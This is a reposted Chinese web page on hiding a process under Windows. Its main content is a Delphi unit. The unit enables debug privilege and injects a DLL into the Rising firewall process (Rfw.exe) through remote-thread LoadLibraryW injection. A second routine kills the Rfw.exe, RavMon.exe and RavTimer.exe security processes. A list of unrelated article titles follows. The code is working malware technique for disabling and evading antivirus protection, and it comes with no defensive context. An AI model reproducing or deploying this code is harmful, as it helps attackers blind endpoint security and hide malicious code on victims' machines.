如何在Windows平台下实现进程隐藏
来源:互联网 发布:fxs1800软件下载 编辑:程序博客网 时间:2024/05/17 22:47
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
StdCtrls, tlhelp32;
{type
TProcessEntry32 = record
dwSize: DWORD;
cntUsage: DWORD;
th32ProcessID: DWORD;
th32DefaultHeapID: DWORD;
th32ModuleID: DWORD;
cntThreads: DWORD;
th32ParentProcessID: DWORD;
pcPriClassBase: integer;
dwFlags: DWORD;
szExeFile: array[0..MAX_PATH - 1] of char;
end; }
type
TForm1 = class(TForm)
Button1: TButton;
Button2: TButton;
procedure Button1Click(Sender: TObject);
procedure Button2Click(Sender: TObject);
private
function TerminateAProcess(var HostFile: string):Boolean;
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.DFM}
procedure FindAProcess(const AFilename: string; const PathMatch: Boolean; var ProcessID: DWORD);
var
lppe: TProcessEntry32;
SsHandle: Thandle;
FoundAProc, FoundOK: boolean;
begin
ProcessID :=0;
SsHandle := CreateToolHelp32SnapShot(TH32CS_SnapProcess, 0);
FoundAProc := Process32First(Sshandle, lppe);
while FoundAProc do
begin
if PathMatch then
FoundOK := AnsiStricomp(lppe.szExefile, PChar(AFilename)) = 0
else
FoundOK := AnsiStricomp(PChar(ExtractFilename(lppe.szExefile)), PChar(ExtractFilename(AFilename))) = 0;
if FoundOK then
begin
ProcessID := lppe.th32ProcessID;
break;
end;
FoundAProc := Process32Next(SsHandle, lppe);
end;
CloseHandle(SsHandle);
end;
function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean;
var
hToken: THandle;
tp: TOKEN_PRIVILEGES;
a: DWORD;
const
SE_DEBUG_NAME = 'SeDebugPrivilege';
begin
Result := False;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then
begin
tp.PrivilegeCount := 1;
LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);
if bEnabled then
tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else
tp.Privileges[0].Attributes := 0;
a := 0;
AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);
Result := GetLastError = ERROR_SUCCESS;
CloseHandle(hToken);
end;
end;
function AttachToProcess(const HostFile, GuestFile: string; const PID: DWORD = 0): DWORD;
var
hRemoteProcess: THandle;
dwRemoteProcessId: DWORD;
cb: DWORD;
pszLibFileRemote: Pointer;
iReturnCode: Boolean;
TempVar: DWORD;
pfnStartAddr: TFNThreadStartRoutine;
pszLibAFilename: PwideChar;
begin
Result := 0;
EnabledDebugPrivilege(True);
Getmem(pszLibAFilename, Length(GuestFile) * 2 + 1);
StringToWideChar(GuestFile, pszLibAFilename, Length(GuestFile) * 2 + 1);
if PID > 0 then
dwRemoteProcessID := PID
else
FindAProcess(HostFile, False, dwRemoteProcessID);
hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + {允许远程创建线程}
PROCESS_VM_OPERATION + {允许远程VM操作}
PROCESS_VM_WRITE, {允许远程VM写}
FALSE, dwRemoteProcessId);
cb := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR);
pszLibFileRemote := PWIDESTRING(VirtualAllocEx(hRemoteProcess, nil, cb, MEM_COMMIT, PAGE_READWRITE));
TempVar := 0;
iReturnCode := WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, cb, TempVar);
if iReturnCode then
begin
pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW');
TempVar := 0;
Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, TempVar);
end;
Freemem(pszLibAFilename);
end;
procedure TForm1.Button1Click(Sender: TObject);
begin
AttachToProcess('Rfw.exe', extractfilepath(paramstr(0))+'Project2.dll');
end;
function TForm1.TerminateAProcess(var HostFile: string): Boolean;
var
HProcessedID:DWORD;
HProcedss:THandle;
begin
Result:=True;
EnabledDebugPrivilege(True);
FindAProcess(HostFile,False,HProcessedID);
if HProcessedID<>0 then
begin
HProcedss:=OpenProcess(PROCESS_TERMINATE,True,HProcessedID);
if not TerminateProcess(HProcedss,0) then
ShowMessage(IntToStr( GetLastError));
end;
EnabledDebugPrivilege(False);
end;
procedure TForm1.Button2Click(Sender: TObject);
var
FileName:array[0..25] of String;
begin
FileName[0]:='Rfw.exe';
FileName[1]:='RavMon.exe';
FileName[2]:='RavTimer.exe';
TerminateAProcess(FileName[1]);
TerminateAProcess(FileName[0]);
TerminateAProcess(FileName[2]);
end;
end.
- 如何在Windows平台下实现进程隐藏
- 在windows内核模式下隐藏进程
- 如何在windows下隐藏驱动器
- 如何在windows平台下造字
- 如何在Windows平台下安装Memcached
- Windows下的进程隐藏
- windows下进程间如何实现通信
- Windows平台下常用进程间通信的实现方式
- Windows平台下常用进程间通信的实现方式
- Windows平台下常用进程间通信的实现方式
- Windows XP中如何在注册表下查看隐藏用户?
- 如何实现在WINDOWS系统下两个进程的通讯问题。
- 如何在Windows平台下Build Avro C接口
- 如何在windows平台下的ActiveTcl中设置环境变量
- 如何在windows平台下编译比特币bitcoin客户端
- 如何在Windows平台下学习Poco自带例程
- 如何在Windows平台下安装或卸载Apache服务
- 如何在windows平台下编译比特币bitcoin客户端
- 转贴一下 老婆日记
- 一步步教你优化Delphi字串查找
- 负载均衡技术全攻略
- 转spring声明式事务管理祥述
- [转帖]让程序在Windows CE系统启动时自动运行[转帖]让程序在Windows CE系统启动时自动运行
- 如何在Windows平台下实现进程隐藏
- 超搞笑的设计模式诠释(绝对经典)
- 2007年我国有效专利状况分析
- Meta标签详解
- 第 一 章软件工程简介
- 《高质量C++编程指南:内存管理》学习笔记
- Ruby on Rails 2.0的新特性介绍(reship)
- 在DOS中格式化C盘,及在DOS下硬盘安装windows2003系统
- 发掘个人的高效时段